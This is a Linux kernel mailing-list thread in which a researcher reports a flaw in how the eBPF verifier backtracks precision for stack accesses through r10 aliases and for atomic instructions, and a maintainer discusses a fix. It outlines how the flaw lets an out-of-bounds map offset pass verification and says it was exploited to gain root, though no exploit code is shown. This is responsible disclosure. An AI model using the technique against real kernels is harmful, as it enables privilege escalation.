
Incorrect backtracking for load/store or atomic ops

Message ID 20231020155842.130257-1-tao.lyu@epfl.ch (mailing list archive)
State Changes Requested
Delegated to: BPF
Headers show
Series Incorrect backtracking for load/store or atomic ops

Checks

Context Check Description
netdev/tree_selection success Not a local patch, async
bpf/vmtest-bpf-next-PR success PR summary
bpf/vmtest-bpf-next-VM_Test-1 success Logs for build for aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-3 success Logs for build for x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-5 success Logs for set-matrix
bpf/vmtest-bpf-next-VM_Test-2 success Logs for build for s390x with gcc
bpf/vmtest-bpf-next-VM_Test-4 success Logs for build for x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-7 success Logs for test_maps on s390x with gcc
bpf/vmtest-bpf-next-VM_Test-9 success Logs for test_maps on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-6 success Logs for test_maps on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-11 success Logs for test_progs on s390x with gcc
bpf/vmtest-bpf-next-VM_Test-8 success Logs for test_maps on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-10 success Logs for test_progs on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-14 success Logs for test_progs_no_alu32 on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-13 success Logs for test_progs on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-12 success Logs for test_progs on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-15 success Logs for test_progs_no_alu32 on s390x with gcc
bpf/vmtest-bpf-next-VM_Test-17 success Logs for test_progs_no_alu32 on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-18 success Logs for test_progs_no_alu32_parallel on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-16 success Logs for test_progs_no_alu32 on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-19 success Logs for test_progs_no_alu32_parallel on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-20 success Logs for test_progs_no_alu32_parallel on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-22 success Logs for test_progs_parallel on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-21 success Logs for test_progs_parallel on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-23 success Logs for test_progs_parallel on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-24 fail Logs for test_verifier on aarch64 with gcc
bpf/vmtest-bpf-next-VM_Test-26 fail Logs for test_verifier on x86_64 with gcc
bpf/vmtest-bpf-next-VM_Test-27 fail Logs for test_verifier on x86_64 with llvm-16
bpf/vmtest-bpf-next-VM_Test-28 success Logs for veristat
bpf/vmtest-bpf-next-VM_Test-25 fail Logs for test_verifier on s390x with gcc
bpf/vmtest-bpf-next-VM_Test-0 success Logs for ShellCheck

Commit Message

Tao Lyu Oct. 20, 2023, 3:58 p.m. UTC
Hi,

I found that the backtracking logic of the eBPF verifier is flawed
when it encounters 1) normal load and store instructions or
2) atomic memory instructions.

# Normal load and store

Here, I show one case involving normal load and store instructions,
which can be exploited to achieve arbitrary read and write under two requirements:
1) The loading program has at least CAP_BPF, which is required for most eBPF applications.
2) CPU mitigations are disabled by adding "mitigations=off" to the kernel boot command line. Otherwise,
the Spectre mitigation in the eBPF verifier prevents exploitation.

                                   1: r3 = r10 (stack pointer)
                                   3:           if cond
                                                 /           \
                                               /                \
        4: *(u64 *)(r3 -120) = 200      6: *(u64 *)(r3 -120) = arbitrary offset to r2
                 verification state 1                  verification state 2 (prune point)
                                              \                  /
                                                \              /
                                      7:  r6 = *(u64 *)(r3 -120)
                                                         ...
                                    17:    r7 = a map pointer
                                    18:            r7 += r6
                         // Out-of-bound access from the right side path

Given an eBPF program (tools/testing/selftests/bpf/test_precise.c)
whose simplified control flow graph looks like the above:
when the verifier goes through the first (left-side) path and reaches insn 18,
it backtracks on register r6 as shown below.

18: (0f) r7 += r6
mark_precise: frame0: last_idx 18 first_idx 17 subseq_idx -1 
mark_precise: frame0: regs=r6 stack= before 17: (bf) r7 = r0
...
mark_precise: frame0: regs=r6 stack= before 7: (79) r6 = *(u64 *)(r3 -120)

However, the backtracking process is problematic when it reaches insn 7.
Insn 7 loads a value from the stack, but the stack pointer is held in r3 instead of r10.
** In this case, the verifier (as shown below) clears the precision mark on r6 without marking the corresponding stack slot. **
Afterward, the backtracking finishes without marking any register or stack slot precise in any verifier state.

    else if (class == BPF_LDX) {
        if (!bt_is_reg_set(bt, dreg))
            return 0;
        bt_clear_reg(bt, dreg);
        if (insn->src_reg != BPF_REG_FP)
            return 0;
        ...
   }

Finally, when the second (right-side) path reaches insn 7 again,
the verifier compares the current state with the previously checkpointed one.
Because no precision mark is set on r6, it considers the two states equal,
so the eBPF program easily passes the verifier
even though the second path contains an invalid access offset.
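
Schematically, the pruning decision at the prune point looks like this (an illustration, not actual verifier output):

    checkpointed state (left path)  : r6 = scalar 200               (not precise)
    current state      (right path) : r6 = scalar arbitrary offset  (not precise)
    -> since the checkpointed r6 is not marked precise, regsafe() treats the
       two scalars as equivalent and the right-side path is pruned.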
We have successfully exploited this bug to gain root privilege.
If needed, we can share the exploit.
BTW, using similar instructions in a subprogram can also trigger a verifier assertion:
"[ 1510.165537] verifier backtracking bug
[ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"



IMO, to fully patch this bug, we need to know whether insn->src_reg is an alias of BPF_REG_FP.
However, that might require too much additional code.
Alternatively, we could simply not clear the precision on the src register.
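
For illustration, a minimal sketch of the first option could look like this
(reg_is_fp_alias() is a hypothetical helper, and computing the slot index from
the alias's frame-relative offset is glossed over):

    else if (class == BPF_LDX) {
        if (!bt_is_reg_set(bt, dreg))
            return 0;
        bt_clear_reg(bt, dreg);
        /* hypothetical helper: true if src_reg is known to point into
         * the current stack frame, e.g. after r3 = r10 */
        if (insn->src_reg != BPF_REG_FP &&
            !reg_is_fp_alias(env, insn->src_reg))
            return 0;
        /* ... compute spi from the frame-relative offset and
         * bt_set_slot(bt, spi), as in the r10 case ... */
    }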

# Atomic memory instructions

Next, I show that the backtracking on atomic load and store instructions is also flawed.
As shown below, when backtrack_insn() in the verifier meets a store instruction,
it checks whether the stack slot is marked precise. If not, it simply returns.

            if (!bt_is_slot_set(bt, spi))
                return 0;
            bt_clear_slot(bt, spi);
            if (class == BPF_STX)
                bt_set_reg(bt, sreg);

Assume we have an atomic_fetch_or instruction (tools/testing/selftests/bpf/verifier/atomic_precision.c) shown below.

7: (4c) w7 |= w3
mark_precise: frame1: last_idx 7 first_idx 0 subseq_idx -1 
mark_precise: frame1: regs=r7 stack= before 6: (c3) r7 = atomic_fetch_or((u32 *)(r10 -120), r7)
mark_precise: frame1: regs=r7 stack= before 5: (bf) r7 = r10
mark_precise: frame1: regs=r10 stack= before 4: (7b) *(u64 *)(r3 -120) = r1
mark_precise: frame1: regs=r10 stack= before 3: (bf) r3 = r10
mark_precise: frame1: regs=r10 stack= before 2: (b7) r1 = 1000
mark_precise: frame1: regs=r10 stack= before 0: (85) call pc+1
BUG regs 400

Before backtracking reaches it, r7 has already been marked as precise.
Since the value of r7 after atomic_fetch_or comes from r10-120,
the precision should be propagated to r10-120.
However, because the stack slot at r10-120 is not marked,
the bt_is_slot_set(bt, spi) condition shown above is not satisfied.
As a result, backtrack_insn() just returns without marking r10-120 as precise.
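
In terms of data flow, r7 = atomic_fetch_or((u32 *)(r10 -120), r7) behaves roughly
like the pseudocode below, which is why the precision on r7 has to flow back into the stack slot:

    u32 old = *(u32 *)(r10 - 120);   /* loaded value; becomes the new r7   */
    *(u32 *)(r10 - 120) = old | w7;  /* stored value depends on the old r7 */
    w7 = old;                        /* r7 now carries the old slot value  */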

This bug can lead to the verifier's assertion as well:
"[ 1510.165537] verifier backtracking bug
[ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"

I've attached a patch that correctly propagates precision for atomic instructions.
However, it still does not solve the problem of the stack slot being addressed through registers other than r10.

Signed-off-by: Tao Lyu <tao.lyu@epfl.ch>
---
 kernel/bpf/verifier.c                         |  58 +++++-
 tools/testing/selftests/bpf/Makefile          |   6 +-
 tools/testing/selftests/bpf/test_precise.c    | 186 ++++++++++++++++++
 .../selftests/bpf/verifier/atomic_precision.c |  19 ++
 4 files changed, 263 insertions(+), 6 deletions(-)
 create mode 100644 tools/testing/selftests/bpf/test_precise.c
 create mode 100644 tools/testing/selftests/bpf/verifier/atomic_precision.c

Comments

Andrii Nakryiko Oct. 22, 2023, 4:59 a.m. UTC | #1
On Fri, Oct 20, 2023 at 9:06 AM Tao Lyu <tao.lyu@epfl.ch> wrote:
>
> Hi,
>
> I found the backtracking logic of the eBPF verifier is flawed
> when meeting 1) normal load and store instruction or
> 2) atomic memory instructions.
>
> # Normal load and store
>
> Here, I show one case about the normal load and store instructions,
> which can be exploited to achieve arbitrary read and write with two requirements:
> 1) The uploading program should have at least CAP_BPF, which is required for most eBPF applications.
> 2) Disable CPU mitigations by adding "mitigations=off" in the kernel booting command line. Otherwise,
> the Spectre mitigation in the eBPF verifier will prevent exploitation.
>
>                                    1: r3 = r10 (stack pointer)
>                                    3:           if cond
>                                                  /           \
>                                                /                \
>         4: *(u64 *)(r3 -120) = 200      6: *(u64 *)(r3 -120) = arbitrary offset to r2
>                  verification state 1                  verification state 2 (prune point)
>                                               \                  /
>                                                 \              /
>                                       7:  r6 = *(u64 *)(r1 -120)
>                                                          ...
>                                     17:    r7 = a map pointer
>                                     18:            r7 += r6
>                          // Out-of-bound access from the right side path
>
> Give an eBPF program (tools/testing/selftests/bpf/test_precise.c)
> whose simplified control flow graph looks like the above.
> When the verifier goes through the first (left-side) path and reaches insn 18,
> it will backtrack on register 6 like below.
>
> 18: (0f) r7 += r6
> mark_precise: frame0: last_idx 18 first_idx 17 subseq_idx -1
> mark_precise: frame0: regs=r6 stack= before 17: (bf) r7 = r0
> ...
> mark_precise: frame0: regs=r6 stack= before 7: (79) r6 = *(u64 *)(r3 -120)
>
> However, the backtracking process is problematic when it reaches insn 7.
> Insn 7 is to load a value from the stack, but the stack pointer is represented by r3 instead of r10.
> ** In this case, the verifier (as shown below) will reset the precision on r6 and not mark the precision on the stack. **
> Afterward, the backtracking finishes without annotating any registers in any verifier states.
>
>     else if (class == BPF_LDX) {
>         if (!bt_is_reg_set(bt, dreg))
>             return 0;
>         bt_clear_reg(bt, dreg);
>         if (insn->src_reg != BPF_REG_FP)
>             return 0;
>         ...
>    }
>
> Finally, when the second (left-side) path reaches insn 7 again,
> it will compare the verifier states with the previous one.
> However, it realizes these two states are equal because no precision is on r6,
> thus the eBPF program an easily pass the verifier
> although the second path contains an invalid access offset.
> We have successfully exploited this bug for getting the root privilege.
> If needed, we can share the exploitation.
> BTW, when using the similar instructions in sub_prog can also trigger an assertion in the verifier:
> "[ 1510.165537] verifier backtracking bug
> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
>
>
>
> IMO, to fully patch this bug, we need to know whether the insn->src_reg is an alias of BPF_REG_FP.

Yes!

> However, it might need too much code addition.

No :) I don't think it's a lot of code. I've been meaning to tackle
this for a while, but perhaps the time is now.

The plan is to use jmp_history to record extra flags for some
instructions (even if they are not jumps). Like in this case, we can
remember for LDX and STX instructions that they were doing register
load/spill, and take that into account during backtrack_insn() without
having to guess based on r10.

I have part of this ready locally; I'll try to finish this up in the
next week or two. Stay tuned (unless you want to tackle that
yourself).
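
Roughly, the idea is something like this (the flag name is illustrative, not
the actual implementation):

    /* Forward pass: when check_mem_access() handles an LDX/STX whose pointer
     * register is PTR_TO_STACK (e.g. after r3 = r10), record a hypothetical
     * INSN_F_STACK_ACCESS flag (plus the slot index) in the jmp_history
     * entry for that instruction.
     *
     * Backward pass: backtrack_insn() consults the recorded flag instead of
     * testing insn->src_reg == BPF_REG_FP, so spills/fills through aliases
     * of r10 keep the precision chain intact.
     */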

> Or we just do not clear the precision on the src register.
>
> # Atomic memory instructions
>
> Then, I show that the backtracking on atomic load and store is also flawed.
> As shown below, when the backtrack_insn() function in the verifier meets store instructions,
> it checks if the stack slot is set with precision or not. If not, just return.
>
>             if (!bt_is_slot_set(bt, spi))
>                 return 0;
>             bt_clear_slot(bt, spi);
>             if (class == BPF_STX)
>                 bt_set_reg(bt, sreg);
>
> Assume we have an atomic_fetch_or instruction (tools/testing/selftests/bpf/verifier/atomic_precision.c) shown below.
>
> 7: (4c) w7 |= w3
> mark_precise: frame1: last_idx 7 first_idx 0 subseq_idx -1
> mark_precise: frame1: regs=r7 stack= before 6: (c3) r7 = atomic_fetch_or((u32 *)(r10 -120), r7)
> mark_precise: frame1: regs=r7 stack= before 5: (bf) r7 = r10
> mark_precise: frame1: regs=r10 stack= before 4: (7b) *(u64 *)(r3 -120) = r1
> mark_precise: frame1: regs=r10 stack= before 3: (bf) r3 = r10
> mark_precise: frame1: regs=r10 stack= before 2: (b7) r1 = 1000
> mark_precise: frame1: regs=r10 stack= before 0: (85) call pc+1
> BUG regs 400
>
> Before backtracking to it, r7 has already been marked as precise.
> Since the value of r7 after atomic_fecth_or comes from r10-120,
> it should propagate the precision to r10-120.
> However, because the stack slot r10-120 is not marked,
> it doesn't satisfy bt_is_slot_set(bt, spi) condition shown above.
> Finally, it just returns without marking r10-120 as precise.

this seems like the same issue with not recognizing stack access
through any other register but r10?

Or is there something specific to atomic instructions here? I'm not
very familiar with them, so I'll need to analyse the code first.

>
> This bug can lead to the verifier's assertion as well:
> "[ 1510.165537] verifier backtracking bug
> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
>
> I've attached the patch for correctly propagating the precision on atomic instructions.
> But it still can't solve the problem that the stack slot is expressed with other registers instead of r10.

I can try to solve stack access through non-r10, but it would be very
useful if you could provide tests that trigger the above situations
you described. Your test_precise.c test below is not the right way to
add tests, it adds a new binary and generally doesn't fit into
existing set of tests inside test_progs. Please see
progs/verifier_xadd.c and prog_tests/verifier.c and try to convert
your tests into that form (you also will be able to use inline
assembly instead of painful BPF_xxx() instruction macros).
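
For reference, such a test would look roughly like the sketch below (the name,
section, and verdict annotations are illustrative, and the map lookup plus the
out-of-bounds pointer arithmetic from your reproducer are elided):

    #include <linux/bpf.h>
    #include <bpf/bpf_helpers.h>
    #include "bpf_misc.h"

    SEC("socket")
    __description("precision: stack fill through r3 alias of r10")
    __failure /* the real test would pin down the expected error via __msg() */
    __naked void precision_stack_fill_via_alias(void)
    {
        asm volatile ("                          \
        r3 = r10;                                \
        r0 = 200;                                \
        *(u64 *)(r3 - 120) = r0;                 \
        r6 = *(u64 *)(r3 - 120);                 \
        r0 = 0;                                  \
        exit;                                    \
    "   ::: __clobber_all);
    }

    char _license[] SEC("license") = "GPL";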

Thanks.

>
> Signed-off-by: Tao Lyu <tao.lyu@epfl.ch>
> ---
>  kernel/bpf/verifier.c                         |  58 +++++-
>  tools/testing/selftests/bpf/Makefile          |   6 +-
>  tools/testing/selftests/bpf/test_precise.c    | 186 ++++++++++++++++++
>  .../selftests/bpf/verifier/atomic_precision.c |  19 ++
>  4 files changed, 263 insertions(+), 6 deletions(-)
>  create mode 100644 tools/testing/selftests/bpf/test_precise.c
>  create mode 100644 tools/testing/selftests/bpf/verifier/atomic_precision.c
>

[...]
Tao Lyu Oct. 23, 2023, 10:12 a.m. UTC | #2

> On Fri, Oct 20, 2023 at 9:06 AM Tao Lyu <tao.lyu@epfl.ch> wrote:
>>
>> Hi,
>>
>> I found the backtracking logic of the eBPF verifier is flawed
>> when meeting 1) normal load and store instruction or
>> 2) atomic memory instructions.
>>
>> # Normal load and store
>>
>> Here, I show one case about the normal load and store instructions,
>> which can be exploited to achieve arbitrary read and write with two requirements:
>> 1) The uploading program should have at least CAP_BPF, which is required for most eBPF applications.
>> 2) Disable CPU mitigations by adding "mitigations=off" in the kernel booting command line. Otherwise,
>> the Spectre mitigation in the eBPF verifier will prevent exploitation.
>>
>>                                    1: r3 = r10 (stack pointer)
>>                                    3:           if cond
>>                                                  /           \
>>                                                /                \
>>         4: *(u64 *)(r3 -120) = 200      6: *(u64 *)(r3 -120) = arbitrary offset to r2
>>                  verification state 1                  verification state 2 (prune point)
>>                                               \                  /
>>                                                 \              /
>>                                       7:  r6 = *(u64 *)(r1 -120)
>>                                                          ...
>>                                     17:    r7 = a map pointer
>>                                     18:            r7 += r6
>>                          // Out-of-bound access from the right side path
>>
>> Give an eBPF program (tools/testing/selftests/bpf/test_precise.c)
>> whose simplified control flow graph looks like the above.
>> When the verifier goes through the first (left-side) path and reaches insn 18,
>> it will backtrack on register 6 like below.
>>
>> 18: (0f) r7 += r6
>> mark_precise: frame0: last_idx 18 first_idx 17 subseq_idx -1
>> mark_precise: frame0: regs=r6 stack= before 17: (bf) r7 = r0
>> ...
>> mark_precise: frame0: regs=r6 stack= before 7: (79) r6 = *(u64 *)(r3 -120)
>>
>> However, the backtracking process is problematic when it reaches insn 7.
>> Insn 7 is to load a value from the stack, but the stack pointer is represented by r3 instead of r10.
>> ** In this case, the verifier (as shown below) will reset the precision on r6 and not mark the precision on the stack. **
>> Afterward, the backtracking finishes without annotating any registers in any verifier states.
>>
>>     else if (class == BPF_LDX) {
>>         if (!bt_is_reg_set(bt, dreg))
>>             return 0;
>>         bt_clear_reg(bt, dreg);
>>         if (insn->src_reg != BPF_REG_FP)
>>             return 0;
>>         ...
>>    }
>>
>> Finally, when the second (left-side) path reaches insn 7 again,
>> it will compare the verifier states with the previous one.
>> However, it realizes these two states are equal because no precision is on r6,
>> thus the eBPF program an easily pass the verifier
>> although the second path contains an invalid access offset.
>> We have successfully exploited this bug for getting the root privilege.
>> If needed, we can share the exploitation.
>> BTW, when using the similar instructions in sub_prog can also trigger an assertion in the verifier:
>> "[ 1510.165537] verifier backtracking bug
>> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
>>
>>
>>
>> IMO, to fully patch this bug, we need to know whether the insn->src_reg is an alias of BPF_REG_FP.
>
> Yes!
>
>> However, it might need too much code addition.
>
> No :) I don't think it's a lot of code. I've been meaning to tackle
> this for a while, but perhaps the time is now.
>
> The plan is to use jmp_history to record an extra flags for some
> instructions (even if they are not jumps). Like in this case, we can
> remember for LDX and STX instructions that they were doing register
> load/spill, and take that into account during backtrack_insn() without
> having to guess based on r10.
>
> I have part of this ready locally, I'll try to finish this up in a
> next week or two. Stay tuned (unless you want to tackle that
> yourself).

Great! I'll keep focus on this.

>
>> Or we just do not clear the precision on the src register.
>>
>> # Atomic memory instructions
>>
>> Then, I show that the backtracking on atomic load and store is also flawed.
>> As shown below, when the backtrack_insn() function in the verifier meets store instructions,
>> it checks if the stack slot is set with precision or not. If not, just return.
>>
>>             if (!bt_is_slot_set(bt, spi))
>>                 return 0;
>>             bt_clear_slot(bt, spi);
>>             if (class == BPF_STX)
>>                 bt_set_reg(bt, sreg);
>>
>> Assume we have an atomic_fetch_or instruction (tools/testing/selftests/bpf/verifier/atomic_precision.c) shown below.
>>
>> 7: (4c) w7 |= w3
>> mark_precise: frame1: last_idx 7 first_idx 0 subseq_idx -1
>> mark_precise: frame1: regs=r7 stack= before 6: (c3) r7 = atomic_fetch_or((u32 *)(r10 -120), r7)
>> mark_precise: frame1: regs=r7 stack= before 5: (bf) r7 = r10
>> mark_precise: frame1: regs=r10 stack= before 4: (7b) *(u64 *)(r3 -120) = r1
>> mark_precise: frame1: regs=r10 stack= before 3: (bf) r3 = r10
>> mark_precise: frame1: regs=r10 stack= before 2: (b7) r1 = 1000
>> mark_precise: frame1: regs=r10 stack= before 0: (85) call pc+1
>> BUG regs 400
>>
>> Before backtracking to it, r7 has already been marked as precise.
>> Since the value of r7 after atomic_fecth_or comes from r10-120,
>> it should propagate the precision to r10-120.
>> However, because the stack slot r10-120 is not marked,
>> it doesn't satisfy bt_is_slot_set(bt, spi) condition shown above.
>> Finally, it just returns without marking r10-120 as precise.
>
> this seems like the same issue with not recognizing stack access
> through any other register but r10?
>
> Or is there something specific to atomic instructions here? I'm not
> very familiar with them, so I'll need to analyse the code first.

Yes, the issue of not recognizing stack accesses through registers other than r10 also affects atomic instructions, since atomic instructions are memory store instructions as well.

But there is another aspect: atomic ops have more complex and different semantics compared to plain memory store instructions, and the backtracking logic does not take care of that.

For example, the insn r7 = atomic_fetch_or((u32 *)(r10 -120), r7) loads the original value at r10-120 into the final r7, and stores back the "or" of the value at r10-120 and the original r7.

Case 1: Assume r7 is marked as precise when the backtracking code meets this instruction; it should then propagate the precision to the stack slot r10-120.

Case 2: Assume r10-120 is marked as precise; after backtracking through this instruction, both r10-120 and r7 should be marked precise.

>
>>
>> This bug can lead to the verifier's assertion as well:
>> "[ 1510.165537] verifier backtracking bug
>> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
>>
>> I've attached the patch for correctly propagating the precision on atomic instructions.
>> But it still can't solve the problem that the stack slot is expressed with other registers instead of r10.
>
> I can try to solve stack access through non-r10, but it would be very
> useful if you could provide tests that trigger the above situations
> you described. Your test_precise.c test below is not the right way to
> add tests, it adds a new binary and generally doesn't fit into
> existing set of tests inside test_progs. Please see
> progs/verifier_xadd.c and prog_tests/verifier.c and try to convert
> your tests into that form (you also will be able to use inline
> assembly instead of painful BPF_xxx() instruction macros).
>
> Thanks.

Sure. I'll reconstruct the test case, maybe by the end of this week, because I'm attending the SOSP conference this week.

>
>>
>> Signed-off-by: Tao Lyu <tao.lyu@epfl.ch>
>> ---
>>  kernel/bpf/verifier.c                         |  58 +++++-
>>  tools/testing/selftests/bpf/Makefile          |   6 +-
>>  tools/testing/selftests/bpf/test_precise.c    | 186 ++++++++++++++++++
>>  .../selftests/bpf/verifier/atomic_precision.c |  19 ++
>>  4 files changed, 263 insertions(+), 6 deletions(-)
>>  create mode 100644 tools/testing/selftests/bpf/test_precise.c
>>  create mode 100644 tools/testing/selftests/bpf/verifier/atomic_precision.c
>>
>
>[...]
Andrii Nakryiko Oct. 23, 2023, 5:06 p.m. UTC | #3
On Mon, Oct 23, 2023 at 3:12 AM Tao Lyu <tao.lyu@epfl.ch> wrote:
>
> >
> > On Fri, Oct 20, 2023 at 9:06 AM Tao Lyu <tao.lyu@epfl.ch> wrote:
> >>
> >> Hi,
> >>
> >> I found the backtracking logic of the eBPF verifier is flawed
> >> when meeting 1) normal load and store instruction or
> >> 2) atomic memory instructions.
> >>
> >> # Normal load and store
> >>
> >> Here, I show one case about the normal load and store instructions,
> >> which can be exploited to achieve arbitrary read and write with two requirements:
> >> 1) The uploading program should have at least CAP_BPF, which is required for most eBPF applications.
> >> 2) Disable CPU mitigations by adding "mitigations=off" in the kernel booting command line. Otherwise,
> >> the Spectre mitigation in the eBPF verifier will prevent exploitation.
> >>
> >>                                    1: r3 = r10 (stack pointer)
> >>                                    3:           if cond
> >>                                                  /           \
> >>                                                /                \
> >>         4: *(u64 *)(r3 -120) = 200      6: *(u64 *)(r3 -120) = arbitrary offset to r2
> >>                  verification state 1                  verification state 2 (prune point)
> >>                                               \                  /
> >>                                                 \              /
> >>                                       7:  r6 = *(u64 *)(r1 -120)
> >>                                                          ...
> >>                                     17:    r7 = a map pointer
> >>                                     18:            r7 += r6
> >>                          // Out-of-bound access from the right side path
> >>
> >> Give an eBPF program (tools/testing/selftests/bpf/test_precise.c)
> >> whose simplified control flow graph looks like the above.
> >> When the verifier goes through the first (left-side) path and reaches insn 18,
> >> it will backtrack on register 6 like below.
> >>
> >> 18: (0f) r7 += r6
> >> mark_precise: frame0: last_idx 18 first_idx 17 subseq_idx -1
> >> mark_precise: frame0: regs=r6 stack= before 17: (bf) r7 = r0
> >> ...
> >> mark_precise: frame0: regs=r6 stack= before 7: (79) r6 = *(u64 *)(r3 -120)
> >>
> >> However, the backtracking process is problematic when it reaches insn 7.
> >> Insn 7 is to load a value from the stack, but the stack pointer is represented by r3 instead of r10.
> >> ** In this case, the verifier (as shown below) will reset the precision on r6 and not mark the precision on the stack. **
> >> Afterward, the backtracking finishes without annotating any registers in any verifier states.
> >>
> >>     else if (class == BPF_LDX) {
> >>         if (!bt_is_reg_set(bt, dreg))
> >>             return 0;
> >>         bt_clear_reg(bt, dreg);
> >>         if (insn->src_reg != BPF_REG_FP)
> >>             return 0;
> >>         ...
> >>    }
> >>
> >> Finally, when the second (left-side) path reaches insn 7 again,
> >> it will compare the verifier states with the previous one.
> >> However, it realizes these two states are equal because no precision is on r6,
> >> thus the eBPF program an easily pass the verifier
> >> although the second path contains an invalid access offset.
> >> We have successfully exploited this bug for getting the root privilege.
> >> If needed, we can share the exploitation.
> >> BTW, when using the similar instructions in sub_prog can also trigger an assertion in the verifier:
> >> "[ 1510.165537] verifier backtracking bug
> >> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
> >>
> >>
> >>
> >> IMO, to fully patch this bug, we need to know whether the insn->src_reg is an alias of BPF_REG_FP.
> >
> > Yes!
> >
> >> However, it might need too much code addition.
> >
> > No :) I don't think it's a lot of code. I've been meaning to tackle
> > this for a while, but perhaps the time is now.
> >
> > The plan is to use jmp_history to record an extra flags for some
> > instructions (even if they are not jumps). Like in this case, we can
> > remember for LDX and STX instructions that they were doing register
> > load/spill, and take that into account during backtrack_insn() without
> > having to guess based on r10.
> >
> > I have part of this ready locally, I'll try to finish this up in a
> > next week or two. Stay tuned (unless you want to tackle that
> > yourself).
>
> Great! I'll keep focus on this.
>
> >
> >> Or we just do not clear the precision on the src register.
> >>
> >> # Atomic memory instructions
> >>
> >> Then, I show that the backtracking on atomic load and store is also flawed.
> >> As shown below, when the backtrack_insn() function in the verifier meets store instructions,
> >> it checks if the stack slot is set with precision or not. If not, just return.
> >>
> >>             if (!bt_is_slot_set(bt, spi))
> >>                 return 0;
> >>             bt_clear_slot(bt, spi);
> >>             if (class == BPF_STX)
> >>                 bt_set_reg(bt, sreg);
> >>
> >> Assume we have an atomic_fetch_or instruction (tools/testing/selftests/bpf/verifier/atomic_precision.c) shown below.
> >>
> >> 7: (4c) w7 |= w3
> >> mark_precise: frame1: last_idx 7 first_idx 0 subseq_idx -1
> >> mark_precise: frame1: regs=r7 stack= before 6: (c3) r7 = atomic_fetch_or((u32 *)(r10 -120), r7)
> >> mark_precise: frame1: regs=r7 stack= before 5: (bf) r7 = r10
> >> mark_precise: frame1: regs=r10 stack= before 4: (7b) *(u64 *)(r3 -120) = r1
> >> mark_precise: frame1: regs=r10 stack= before 3: (bf) r3 = r10
> >> mark_precise: frame1: regs=r10 stack= before 2: (b7) r1 = 1000
> >> mark_precise: frame1: regs=r10 stack= before 0: (85) call pc+1
> >> BUG regs 400
> >>
> >> Before backtracking to it, r7 has already been marked as precise.
> >> Since the value of r7 after atomic_fecth_or comes from r10-120,
> >> it should propagate the precision to r10-120.
> >> However, because the stack slot r10-120 is not marked,
> >> it doesn't satisfy bt_is_slot_set(bt, spi) condition shown above.
> >> Finally, it just returns without marking r10-120 as precise.
> >
> > this seems like the same issue with not recognizing stack access
> > through any other register but r10?
> >
> > Or is there something specific to atomic instructions here? I'm not
> > very familiar with them, so I'll need to analyse the code first.
>
> The non-recognizing stack access through other non-r10 registers can also affect atomic instructions as atomic instructions are also memory store instructions.
>
> But there is another aspect, that atomi ops has much complex/different semantic compared to memory store instructions. However, the backtracking logic didn't take care of it.
>
> For example, insn r7 = atomic_fetch_or((u32 *)(r10 -120), r7) will load the original value at r10-120 to the final r7, and store the "or" result of the value at r10-120 and original r7.
>
> Case 1: Assume r7 is marked as precise and then the backtracking code meets this instruction, it should propagate the precision to the stack slot r10-120.
>
> Case 2: Assume r10-120 is marked as precise, after this instruction, r10-120 and r7 should both be marked precise.
>

So, generally speaking, an atomic operation's memory argument can't be
precise, as it is supposed to be modified by other CPUs simultaneously,
so we can never be sure about its actual value.

But using a stack pointer is kind of a special case where atomicity
doesn't matter, because no one should be accessing the stack from another
CPU. So perhaps we can special-case this.

Either way, I'm going to concentrate on more generally recognizing stack
access for any instruction, and we can work on fixing atomic-specific
semantics on top of that separately.

> >
> >>
> >> This bug can lead to the verifier's assertion as well:
> >> "[ 1510.165537] verifier backtracking bug
> >> [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50"
> >>
> >> I've attached the patch for correctly propagating the precision on atomic instructions.
> >> But it still can't solve the problem that the stack slot is expressed with other registers instead of r10.
> >
> > I can try to solve stack access through non-r10, but it would be very
> > useful if you could provide tests that trigger the above situations
> > you described. Your test_precise.c test below is not the right way to
> > add tests, it adds a new binary and generally doesn't fit into
> > existing set of tests inside test_progs. Please see
> > progs/verifier_xadd.c and prog_tests/verifier.c and try to convert
> > your tests into that form (you also will be able to use inline
> > assembly instead of painful BPF_xxx() instruction macros).
> >
> > Thanks.
>
> Sure. I'll re-construct the test case may the end of this week because I'm attending a conference SOSP this week.

Sounds good, thanks.

>
> >
> >>
> >> Signed-off-by: Tao Lyu <tao.lyu@epfl.ch>
> >> ---
> >>  kernel/bpf/verifier.c                         |  58 +++++-
> >>  tools/testing/selftests/bpf/Makefile          |   6 +-
> >>  tools/testing/selftests/bpf/test_precise.c    | 186 ++++++++++++++++++
> >>  .../selftests/bpf/verifier/atomic_precision.c |  19 ++
> >>  4 files changed, 263 insertions(+), 6 deletions(-)
> >>  create mode 100644 tools/testing/selftests/bpf/test_precise.c
